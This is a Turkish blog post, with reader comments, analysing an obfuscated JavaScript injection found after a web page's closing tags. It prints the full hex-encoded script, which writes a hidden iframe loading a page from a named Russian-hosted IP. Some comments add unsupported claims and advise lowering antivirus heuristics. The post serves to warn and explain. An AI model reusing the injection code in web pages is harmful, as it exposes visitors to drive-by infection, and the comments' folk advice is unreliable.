HEUR/HTML.Malware Virüsüne dikkat…

Merhaba arkadaşlar bir internet sayfasında surf yaparken denk geldim… HTML kodları arasına bulaşan bu virüsü bir kısım antivirüs programları algılamıyor malesef. Şuan deneme amaçlı kulllandığım Antivir programı hemen beni uyardı. Söylediğim gibi sörf yaparken denk geldim bu uyarıya.. Öncelikle birkaç antivirüs programı ile kontrol ettim ama yakalamadılar. Sadece Antivir mi yakalıyor ? O zaman bir yanlış anlaşılma olabilir dedim.

Yanlış bir alarm olup olmadığını kontrol için hemen eplorer de sağ tıklayıp kaynağı görüntüle yaptım… HTML kodlarını yukarıdan aşağıya doğru inerken </body> </html> kodlarından sonra aşağıdaki kodlara denk geldim…

</body>
</html>
<iframe src='http://url ' width='1' height='1' style = 'visibility: hidden;'> </iframe> <script> function v4804105e4e5e9(v4804105e4eda0){ function v4804105e4f56f () {return 16;} return(parseInt(v4804105e4eda0,v4804105e4f56f()));}function v4804105e5050c(v4804105e50ce5){ function v4804105e524c7 () {var v4804105e52cc0=2; return v4804105e52cc0;} var v4804105e514d9='';for(v4804105e51cd1=0; v4804105e51cd1<v4804105e50ce5.length; v4804105e51cd1+=v4804105e524c7()){ v4804105e514d9+=(String.fromCharCode(v4804105e4e5e9(v4804105e50ce5.substr(v4804105e51cd1, v4804105e524c7()))));}return v4804105e514d9;} document.write(v4804105e5050c('3C5343524950543E77696E646F772E7374617475733D2744 6F6E65273B646F63756D65 6E742E777269746528273C6 96672616D65206E616D653 D37207372633D5 C27687474703A2 F2F37372E323231 2E3133332E313 9302F2E6966 2F676F2E68746D6C 3F272B4D61746 82E726F756E6 4284D617468 2E72616E64 6F6D28292A36 3930292B27 3338303735353 7655C272077 696474683D363 920686569676 8743D313020737 4796C653D5C276 46973706C6179 3A206E6F6E 655C273E3C2F 696672616D653E2 7293C2F5343524 950543E')); </script>

Tabiki kodları incelemeye aldım. Gördüm ki bu kodlar sayfanın en altına bir iframe açmakta ve gizli olarak açmakta…

<iframe src='http://url ' width='1' height='1' style = 'visibility: hidden;'> </iframe>

Scriptide bu iframe içerisinde çalıştırıyor. Tabiki “hidden;” kodunu görmüşsünüzdür. Yani gizli olarak açmakta. Kullanıcı hiçbir şekilde fark etmiyor…

Bu iframe içersinde scripti çalıştırıyor. Script ise 77.221.133.190 ip adresine bağlanmakta.

http://77.221.133.X/.if/go.html?[random_nr]

Scrip çalıştığında bu hale geliyor…

İp adresini sorguladığımda ise

Results:
% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

% Note: This output has been filtered.
% To receive output for a database update, use the “-B” flag.

% Information related to ‘77.221.128.0 – 77.221.143.255’

inetnum: 77.221.128.0 – 77.221.143.255
netname: DATAPOINT-NET2
descr: Colocation and virtual hosting
descr: For abuse, spam an other comliants mailto:[email protected]
country: RU
admin-c: IBA-RIPE
tech-c: IBA-RIPE
status: ASSIGNED PA
mnt-by: INFOBOX-MNT
source: RIPE # Filtered

person: Infobox Abuse Manager
address: 29, Viborgskaya nab.,
address: 198215 Saint Petersburg, Russia
e-mail: [email protected]
phone: +7 812 3312999
nic-hdl: IBA-RIPE
mnt-by: INFOBOX-MNT
source: RIPE # Filtered

% Information related to ‘77.221.128.0/19AS30968’

route: 77.221.128.0/19
descr: DATACENTER2
origin: AS30968
mnt-by: INFOBOX-MNT
source: RIPE # Filtered

Rusyada bir datacenter karşıma çıkıyor. Aman dikkat işin içerisinde RUSLAR varsa dikkat etmek lazım:)

Script çalıştığında çıkan sonuç..

<iframe src=”http://77.221.133.X/.dif/go.php?sid=1″ style=”border:0px solid gray;” WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>

Tavsiyem bu virüsü yakalayabilen bir anti-virüs programı ile sisteminiizi taratmanızdır. Birdefender ve Antivir bizzat denedim yakalayabiliyor.. Çok tehlikeli bir virüs değil.Tam olarakda sistemde yani windows’ta ne yapıyor bilmiyorum. Bunuda biraz araştıracağım. Tabi öncelikle kendi sistemime bulaştırdığım bu virüsü kaldıracağım sonrada site sahibini uyaracağım. Eminim farkında bile değildir….

SONUÇ :

En iyi virüs programı yoktur…

Birçok program iyidir fakat en iyisi diye bir belirleme yapamayız.

Bazıları anti-virüslerde iyidir trojanlarda zayıf bazıları trojanlarda çok iyidir fakat virüslerde zayıf bazılarıda güvenlik duvarında iyidir fakat diğer yönleri zayıf olabilir…

 

“HEUR/HTML.Malware Virüsüne dikkat…” üzerine 17 yorum

  1. kardes virus bende de cıkıyo ama bi turlu oldugu dosyayı bulamadım bilgisayarda ve antivir kullanıyom ama siliorum tekrar geliyor ne yapmam lazım yardım

    Yanıtla
  2. arkadaşlar kayseride int. kafe işleticisiyim. 2 gündür benimde başımda bu sorun ve bütün makinelerim haşat. 5-10 dakkaya bi kafedeki pc lerden birkaçı kitleniyor ve kitlenince diğerleride netten düşüyor resetleyince düzeliyor ama yine yapıyor bi müddet sonra. ana makinemde antivir bu virüsü buluyor fakat silmiyor. ana makinemde aynı şekilde kitleniyor.

    Yanıtla
  3. Bende az önce tarattım ve daha önce görmediğim HEUR/HTML.malware virüsüne rastladım fakat antiVir yakaladığı halde silmiyor , ancak ŞÜPHELİ bölümüne atıyor :S silmek için ne napmak lazım bilgilendirirseniz sevinirim veya PC ye ne gibi zararı dokunur….????

    Yanıtla
  4. ARkadaşlar bende karşılaştım bu wirüsle ama antivir kullanıyorum sadece siteden gelirken engelliyor aslında hiç bir siteden gelmiyor bu internet explorer e yapışıyor we sayfaları acarken oda sitesine gidip wirüs cekiyor we genelde tempde saklıyor jawascirp kodları ilede windowsu sıkıyor ram bi anda tawan yapıyor pc nin yawaşlamasıda bu yüzden antivir orjinaller belki silebilir bunu personeller su anda engelliyor…

    Yanıtla
  5. Merhaba arkadaşlar. Bende de bu virüs var. Bu virüs bir oyundan geldi. Virüsü siliyorum fakat bilgisayarı kapatıp açınca tekrar geliyor. Dosyaları tempe saklıyor fakat kaynağını bulamadım. Bir de Antivir’in çalışmamasını sağlıyor ve bazı programların exesini siliyor. Ne yapmam lazım bir yardımmm…

    Yanıtla
  6. Bu virus ne yapıyor biliyor musunuz arkadaşlar ?

    en önemli zararı bilgisayarın ses sistemini bozuyor sonra kamera yı.
    bazı bilgisayarları kitliyor ama en önemli zararı ses e.

    Yanıtla
  7. bu haylaz bendede var kaspersky ile siliyorum ama daha sonra yeniden çikiyor
    kaynağı bulup yok etmek gerek sonuca varamiyoruz bir parçasini c:/ nin içine atiyor (khwx.exe) sanırım tıklanmasını istiyor olabilir system yedek klasörünede yedeğini aliyor sistemi geri yüklersen diye
    davetçiyi bulmak gerek

    Yanıtla
  8. bence bu virüsü kullanan bir turk hekır benim msn de yazıştıgım kişiye aynı anda benimle beraber ileti gönderiyor her 5 dk de bir msn kapanıyor

    Yanıtla
  9. akadaşlar bu virüs axa soft ingilizce konuşan sözlük yüklemeyle bana da geldi yöneticiyi devre dışı bırakabiliyor…çok tehlikeli…

    Yanıtla
  10. bende aviranın son sürümü gizli, bu virüsü buldu fakat axa softun içinde nasıl bulacağımı bilmiyorum

    Yanıtla
  11. Evet bende de aynı sorun var, yanlış alarm diye düşünmüştüm fakat, avirayı doğrusu tebrik ediyorum. Gitti gidiyor sitesinde daha doğrusu php temelli sitelerde ve forumlarda virüs aktive oluyor. Bunu silmek için ayrı bir araç gerek sanırım.

    Yanıtla
  12. Avirayı açın F8 e basın expert mode işaretleyin
    guard-scan sekmesinden heuristic enable AheAd> ayarını low yapın düzelecektir.

    Yanıtla

Yorum yapın